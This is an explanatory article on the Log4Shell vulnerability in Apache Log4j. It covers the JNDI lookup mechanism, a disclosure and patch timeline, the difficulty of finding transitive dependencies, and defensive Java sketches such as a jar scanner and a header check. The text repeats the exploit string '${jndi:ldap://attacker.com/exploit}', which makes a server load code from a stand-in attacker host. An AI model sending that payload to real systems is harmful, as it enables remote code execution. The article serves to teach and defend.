Log4Shell: A Feature Nobody Needed, a Vulnerability in a Billion Systems, and the Supply Chain That Could Not Be Patched Fast Enough
The System as Its Engineers Understood It
Apache Log4j is a logging library for Java. It is one of the most widely used components in the Java ecosystem. Logging is infrastructure: nearly every Java application writes log messages, and Log4j is the most common way to do it. Estimates of Log4j’s deployment scope vary, but the library is present in hundreds of millions of Java applications and devices worldwide, from web servers to enterprise applications to embedded systems to Minecraft servers.
Log4j does more than write strings to files. It has a feature called message lookup substitution. When a log message contains a string of the form ${...}, Log4j interprets the content between the braces as a lookup expression and substitutes the result. For example, ${java:version} is replaced with the Java runtime version. ${env:USER} is replaced with the value of the USER environment variable. This is a convenience feature: developers can embed dynamic values in log messages without concatenation.
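To make the substitution idea concrete, here is a minimal sketch of how a ${prefix:key} expression might be resolved. It is a toy model and not Log4j's implementation: the class name LookupSketch, the resolver table, and the decision to leave unknown expressions untouched are all assumptions made for illustration, and nested expressions are not handled.

```java
import java.util.Map;
import java.util.function.Function;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Toy model of ${prefix:key} substitution. Not Log4j's actual code. */
public class LookupSketch {
    // Matches ${prefix:key} without nesting; a real parser is more permissive.
    private static final Pattern LOOKUP = Pattern.compile("\\$\\{([a-z]+):([^}]+)\\}");

    // Hypothetical resolver table: prefix -> function from key to value.
    private static final Map<String, Function<String, String>> RESOLVERS = Map.of(
        "env", key -> System.getenv(key),
        "sys", key -> System.getProperty(key)
    );

    static String substitute(String message) {
        Matcher m = LOOKUP.matcher(message);
        StringBuilder out = new StringBuilder();
        while (m.find()) {
            Function<String, String> resolver = RESOLVERS.get(m.group(1));
            String value = resolver == null ? null : resolver.apply(m.group(2));
            // Unknown prefix or missing value: keep the expression as written.
            String replacement = value == null ? m.group() : value;
            m.appendReplacement(out, Matcher.quoteReplacement(replacement));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        System.out.println(substitute("JVM ${sys:java.version} started by ${env:USER}"));
    }
}
```

The point of the sketch is that the resolver runs on whatever text reaches the logger. Nothing in substitute distinguishes a string the developer wrote from one a remote user supplied.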
One of the available lookup types is JNDI (Java Naming and Directory Interface). JNDI is a Java API for accessing naming and directory services: LDAP directories, DNS, RMI registries. A JNDI lookup in a log message takes the form ${jndi:ldap://example.com/exploit}. When Log4j encounters this string in a log message, it:
1. Parses the JNDI lookup expression
2. Connects to the specified LDAP server (example.com)
3. Retrieves the object at the specified path (/exploit)
4. The LDAP response can include a reference to a Java class hosted on a remote server
5. Java loads and instantiates that remote class
Step 5 means that an attacker who can control any part of a log message can execute arbitrary code on the server running Log4j.
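The first three steps above are mostly string handling, which the following sketch illustrates. It only splits the expression into the server and path that a lookup would contact. It opens no network connection and performs no JNDI call. The class and method names are hypothetical.

```java
import java.net.URI;

/** Splits a JNDI lookup string into its parts. Performs no network access. */
public class JndiExpressionSketch {
    static URI target(String expression) {
        String prefix = "${jndi:";
        if (!expression.startsWith(prefix) || !expression.endsWith("}")) {
            throw new IllegalArgumentException("not a JNDI lookup: " + expression);
        }
        // Everything between "${jndi:" and the closing brace is the service URL.
        return URI.create(expression.substring(prefix.length(), expression.length() - 1));
    }

    public static void main(String[] args) {
        URI u = target("${jndi:ldap://example.com/exploit}");
        // prints: ldap example.com /exploit
        System.out.println(u.getScheme() + " " + u.getHost() + " " + u.getPath());
    }
}
```

Both the host and the path come straight from the logged string, so whoever controls the string chooses the server that answers.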
The JNDI lookup feature was added to Log4j 2.0-beta9 in 2013. It was intended for use cases like logging configuration that varies by environment: looking up a configuration value from an LDAP directory or a DNS service. Whether anyone used it for this purpose at significant scale is unclear. What is clear is that the feature was available and enabled by default in every Log4j 2.x installation from 2013 onward.
The attack surface is enormous because log messages routinely contain user-controlled data. Web servers log HTTP headers, and any of them (User-Agent, Referer, X-Forwarded-For, or any other) can carry attacker-controlled strings. Application servers log user input for debugging. Authentication systems log usernames. Any point where user-supplied data is written to a log message through Log4j 2.x is a potential attack vector.
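As a rough illustration of how many inputs would need inspecting, the sketch below flags request headers whose value contains the literal text ${jndi:. The class name and the header map are hypothetical. This is deliberately naive: nested lookups such as ${${lower:j}ndi:...} would slip past a literal match, so it should be read as a picture of the problem rather than a defense.

```java
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Locale;
import java.util.Map;

public class HeaderScanSketch {
    /** Returns the names of headers whose value contains a literal "${jndi:" (case-insensitive). */
    static List<String> suspiciousHeaders(Map<String, String> headers) {
        List<String> hits = new ArrayList<>();
        for (Map.Entry<String, String> e : headers.entrySet()) {
            String value = e.getValue();
            if (value != null && value.toLowerCase(Locale.ROOT).contains("${jndi:")) {
                hits.add(e.getKey());
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        Map<String, String> headers = new LinkedHashMap<>();
        headers.put("User-Agent", "${jndi:ldap://attacker.com/exploit}");
        headers.put("Referer", "https://example.com/");
        System.out.println(suspiciousHeaders(headers)); // prints: [User-Agent]
    }
}
```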
The Chain
November 24, 2021. Chen Zhaojun of Alibaba’s Cloud Security Team reports the vulnerability to the Apache Software Foundation. The vulnerability is assigned CVE-2021-44228 and a severity score of 10.0 out of 10.0 (the maximum).
December 1, 2021. A pull request is created in the Apache Log4j GitHub repository to address the vulnerability. The pull request is not immediately merged because the fix requires careful review to avoid breaking backwards compatibility.
December 9, 2021. The vulnerability is disclosed publicly before a patch is widely available. Proof-of-concept exploit code begins circulating. The vulnerability is trivially exploitable: an attacker sends a string containing ${jndi:ldap://attacker.com/exploit} in any field that will be logged. No authentication is required. No special conditions are needed. A single HTTP request with the exploit string in the User-Agent header is sufficient.
December 10, 2021. Apache releases Log4j 2.15.0, which disables message lookup substitution by default and restricts JNDI LDAP connections to localhost by default. Exploitation attempts surge. Security firms report scanning activity from IP addresses worldwide, probing every accessible service for the Log4Shell vulnerability.
December 10-28, 2021. The initial patch (2.15.0) is found to be incomplete. Certain configurations remain vulnerable. Apache releases 2.16.0 on December 13, which disables JNDI by default and removes message lookup substitution entirely. On December 17, a denial-of-service vulnerability in 2.16.0 is discovered, and Apache releases 2.17.0. On December 28, an additional remote code execution variant is found, and 2.17.1 is released.
Four patches in 18 days. Each patch after the first addressed a variant missed by, or a gap left in, the one before.
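The release sequence above can be summarized as a lookup from version to status. The sketch below encodes only the four releases named in this timeline. It is an assumption-laden simplification: the class name and status strings are invented for illustration, pre-release tags such as 2.0-beta9 are not parsed, and the separate backport releases issued for older Java versions are ignored.

```java
public class Log4jTimelineSketch {
    /** Maps a plain "major.minor[.patch]" version to the status given in the timeline above. */
    static String status(String version) {
        String[] parts = version.split("\\.");
        int major = Integer.parseInt(parts[0]);
        int minor = Integer.parseInt(parts[1]);
        int patch = parts.length > 2 ? Integer.parseInt(parts[2]) : 0;
        if (major != 2) return "outside the 2.x line discussed here";
        if (minor < 15) return "JNDI message lookup enabled by default";
        if (minor == 15) return "first fix, later found incomplete";
        if (minor == 16) return "denial-of-service issue found";
        if (minor == 17 && patch == 0) return "further remote code execution variant found";
        return "2.17.1 or later";
    }

    public static void main(String[] args) {
        for (String v : new String[] {"2.14.1", "2.15.0", "2.16.0", "2.17.0", "2.17.1"}) {
            System.out.println(v + ": " + status(v));
        }
    }
}
```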
December 2021 through 2022. The patching challenge becomes apparent. Identifying which systems contain Log4j is the first problem. Log4j is a transitive dependency: it is included in other libraries and frameworks, which are included in applications, which are deployed in containers, which run on servers. An organization may have hundreds of applications, and determining which ones contain Log4j 2.x requires scanning every application’s dependency tree, every container image, and every server.
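One way to approach the identification problem is to search archives for the class that implements the JNDI lookup. The sketch below walks a directory and reports every .jar file that directly contains that class file. The class name JarScanSketch and its method are hypothetical, and the approach has known blind spots: it does not look inside jars nested in other archives (fat jars, WAR files), it does not unpack container images, and it would miss a copy whose packages had been relocated.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.List;
import java.util.stream.Stream;
import java.util.zip.ZipFile;

public class JarScanSketch {
    // Class file in log4j-core that implements the JNDI lookup.
    static final String JNDI_LOOKUP_ENTRY = "org/apache/logging/log4j/core/lookup/JndiLookup.class";

    /** Returns every .jar under root that directly contains the JndiLookup class. */
    static List<Path> findJarsWithJndiLookup(Path root) throws IOException {
        List<Path> hits = new ArrayList<>();
        try (Stream<Path> paths = Files.walk(root)) {
            for (Path p : (Iterable<Path>) paths::iterator) {
                if (!Files.isRegularFile(p) || !p.toString().endsWith(".jar")) continue;
                try (ZipFile zip = new ZipFile(p.toFile())) {
                    if (zip.getEntry(JNDI_LOOKUP_ENTRY) != null) hits.add(p);
                } catch (IOException unreadable) {
                    // Skip archives that cannot be opened; a real scanner would report them.
                }
            }
        }
        return hits;
    }

    public static void main(String[] args) throws IOException {
        Path root = Path.of(args.length > 0 ? args[0] : ".");
        findJarsWithJndiLookup(root).forEach(System.out::println);
    }
}
```

Even this simple version has to open every archive on disk, which hints at why inventorying hundreds of applications took organizations weeks rather than hours.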
The second problem is embedded systems. Log4j is present in network appliances, IoT devices, industrial controllers, and other systems that cannot be easily patched. These systems may run Java applications that include Log4j as a transitive dependency, and the device manufacturer may be slow to release a firmware update, or may no longer support the device.
The diagram shows the attack mechanism in five steps: attacker sends a crafted string, the string is passed to Log4j for logging, Log4j parses the JNDI lookup, Log4j connects to the attacker’s LDAP server, and the LDAP response directs the JVM to load and execute attacker-controlled code. The critical observation is that the attack crosses the boundary from “data being logged” to “code being executed” through a feature that was designed to work exactly this way.